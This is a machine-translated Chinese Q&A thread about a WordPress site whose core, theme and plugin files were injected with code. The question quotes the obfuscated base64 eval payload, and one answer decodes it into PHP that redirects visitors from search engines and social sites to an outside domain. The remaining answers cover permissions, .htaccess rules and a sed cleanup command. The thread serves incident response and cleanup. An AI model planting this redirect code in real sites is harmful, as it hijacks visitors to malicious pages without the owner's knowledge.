我们为客户端运行的WordPress网站已被编译并正在尝试确定他们可能如何进入。似乎他们已将代码注入到每个WP核心文件,所有主题文件和仅少数选择插件文件中。
他们使用的代码是:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
有没有人见过或听过这个?有没有人知道如何发生这种情况的线索?所有WP文件权限都设置为建议的级别。
感谢您的时间。
答案 0 :(得分:3)
我看到这种情况最常见的方式是人们将所有文件和文件夹设置为777.如果你必须为你的wp-content / uploads文件夹执行此操作,请确保你有.htaccess指令阻止脚本在那里执行。您的文件和文件夹应具有运行所需的最低权限(文件644,文件夹755)。
答案 1 :(得分:2)
您还必须完成这些WP链接中的所有说明,以彻底清除安装并防止将代码注入WP核心或模板文件:请参阅FAQ: My site was hacked « WordPress Codex和How to completely clean your hacked wordpress installation以及{{3 }和How to find a backdoor in a hacked WordPress告诉您的主机并更改所有密码。也可能改变主机;一些共享主机比其他主机更容易受到攻击。
这一直没有用,因为它取决于整体服务器和Web主机参数,这些参数在廉价的共享主机上可能会使它们容易受到攻击,但您可以尝试使用这些参数来保护.htaccess和wp-config.php:< / p>
<Files .htaccess>
order deny,allow
deny from all
</Files>
<Files wp-config.php>
order allow,deny
deny from all
</Files>
在.htaccess。
答案 2 :(得分:1)
前几天我遇到了这个问题,发现sed非常有用于清理垃圾。它附加到每个开放的PHP标记,并经常在行的末尾留下代码,因此需要一些仔细的配置。
我相信这是我使用的命令,但要小心,毕竟这是sed; - )......
find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} \;
答案 3 :(得分:1)
那么,下面的代码是将您的用户重定向到黑名单的恶意软件网站?那是你正在经历的吗?
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://costabrava.bee.pl/");
exit();
}
}
}
}
你的Wordpress版本可能容易受到XSS攻击。此链接讨论它。 http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/
你在哪个版本?
答案 4 :(得分:1)
我有完全相同的问题。
我猜这个网站是通过小部件感染的,因为我使用了一个允许执行PHP代码的插件。
我最好的解决方案是:
从那一刻起问题就消失了。